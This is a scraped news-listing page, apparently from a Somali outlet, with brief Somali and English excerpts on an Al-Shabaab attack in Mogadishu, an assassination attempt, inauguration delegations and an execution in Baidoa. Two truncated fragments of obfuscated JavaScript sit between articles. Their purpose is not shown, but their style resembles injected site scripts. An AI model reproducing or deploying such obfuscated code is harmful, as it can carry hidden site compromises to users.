Mid kamid ah dadkii ka badbaaday weerarkii xarunta gobolka Bamaadir oo wareysi bixiyay
MUQDISHO (SMN) - Waxaa weli isa soo tarayo macluumaadka laga helayo weerarkii xooganaa ee ay shalay kooxda Al-Shabaab ku qaaday xarunta maamulka gobolka Banaadir, kaas oo sababay khasaare isugu jiro dhimasho iyo dhaawac.
Weerarka waxaa fuliyay xubno ka tirsan kooxda Al-Shabaab oo isku soo ekeysiiyay ciidamada dowladda, kuwaas beegsaday dhismaha xarunta aqalka dowladda hoose ee Xamar.
Ugu yaraan 5 qof ayaa...
Shacab kasoo barakacay dhibaatada Al-Shabaab oo soo gaaray Muqdisho
Qoysas Soomaaliyeed oo kasoo barackay deegaannada ay ka arrimayaan Al-Shabaab ayaa maanta soo gaaray magaalada Muqdisho, kuwaas oo ay haystaan xaalado bani’aadanimo iyo kuwa ammaan darri oo ay uga soo tageen deegaankooda.
Dadkan oo ka kala yimid meelo kala duwan ayaa tegay xarumaha hay’daha amniga, si ay dhibtooda ugu sheegtaan, maadaama ay soo maciin bideen Dowladda Federaalka Soomaaliya oo haatan...
Kooxo hubeysan oo weerar ka fuliyay Muqdisho + Bartilmaameedka
MUQDISHO (SMN) - Faah-faahinno kala duwan ayaa kasoo baxaya isku-day la doonayay in lagu khaarijiyo Hamdi Sharif Ali oo ka tirsan shaqaalaha wasaaradda maaliyadda Soomaaliya oo maanta ka dhacay magaalada Muqdisho.
Labada nin ayaa mar qura rasaas huwiyay Mooto Bajaj (Tuk-Tuk) oo ay la socotay, inkastoo ay badbaaday Hamdi Sharif Ali oo ahayd bartilmaameedka weerarka.
Dad goobjoogayaal ah ayaa innoo sheegay...
Foreign delegation land in Mogadishu for president’s inauguration
MOGADISHU - High-level delegations from the region and across the world that will attend the Presidential Inauguration of Hassan Sh. Mohamud, on Tuesday, arrived in the Somali capital Mogadishu.
Some of these delegations came prior to their heads of State, therefore, those who landed at Aden Abdulle International Airport include, Djibouti, Ethiopia, Kenya, and Bahrain according to the Protocol Department...
A man executed in Southwest State for killing a woman
BAIDOA - Southwest State has carried out a swift execution of a man accused of killing a businesswoman in Baidoa city.
Hassan Mohamed was executed by firing squad after Bay regional court found him guilty and sentenced him to death for killing a woman and hiding her body in a toilet Sewer.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Sawirro: Wafuud caalami ah oo oo soo gaartay magaalada Muqdisho
MUQDISHO (SMN) - Waxaa saacadihii lasoo dhaafay soo gaaray magaalada Muqdisho wufuud caalami ah, kuwaas oo doonaya inay ka qeyb galaan xafladda caleema saarka madaxweynaha Soomaaliya mudane, Xasan Sheekh Maxamuud.
Wafdiga maanta yimid Muqdisho oo isugu jira xubo horudhac u ah madaxda sare e dalalkooda iyo wakiillo dowladeed.
Xubnahan ayaa waxaa ka mid ah Wasiirka difaaca ee dalka Uganda Vicent Bamulangaki...
Sawirro: Madaxweynaha Soomaaliya oo kormeeray Wasaaradda Gaashaandhigga
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta kormeer shaqo ku tagay xarunta Wasaaradda Gaashaandhigga.
Ujeedka kormeerka Madaxweynaha ayaa ahaa u kuurgelidda hannaanka shaqo ee Wasaaradda iyo Taliska Guud ee Ciidanka Xoogga Dalka Soomaaliyeed.
Madaxweynaha ayaa kulamo la leh haatan, taliyeyaasha iyo saraakiisha hoggaannada Taliska Ciidanka Xoogga Dalka Soomaaliyeed.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...
Koonfur Galbeed oo toogasho ku fulisay nin dil ka geystay magaalada Baydhabo
BAYDHABO (SMN) - Maxkamadda gobolka Baay ayaa saaka xukun dil toogasho ah ku ridday Maxamed Xasan Maxamed oo lagu helay dilkii loo geystay Aamino Malaaq oo maalmo ka hor si arxan darro ah loogu dilay Baydhabo.
Eedeysanaha oo isla maanta lagu fuliyey xukunka lagu riday ayaa lagu toogtay goob fagaare ah, waxaana goobjoog ahaa dadweyne fara badan iyo mas'uuliyiinta maamulka.
Sida...
Wararkii ugu dambeeyey ee xafladda caleema saarka Madaxweynaha + Sawirro
MUQDISHO (SMN) -Guddoomiyaha Gobolka Banaadir Ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish) ayaa shir guddoomiyay kulan looga hadlayay u diyaar-garowga sugida Caasimada Amniga Maalinta Caleema Saarka Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, kaasi oo uu kasoo qeyb galay Wasiirka Wasaarada Amniga DFS, Taliyaha Ciidanka Booliska Soomaaliya, Taliyeyaasha Qeybta Guud ee Booliska iyo Nabadsugida, Dhamaan Saraakiisha Saldhigyada iyo Guddoomiyeyaasha...
AU pays tribute to Burundian soldiers killed in Somalia
On a visit to the Great Lakes region, Ambassador Bankole Adeoye, who is the Commissioner for Political Affairs, Peace, and Security at the African Union, paid tribute to Burundian soldiers who died while on service in Somalia.
In the company of former Burundian President Domitien Ndayizeye, who is now a member of the AU advisory panel, he laid a wreath...











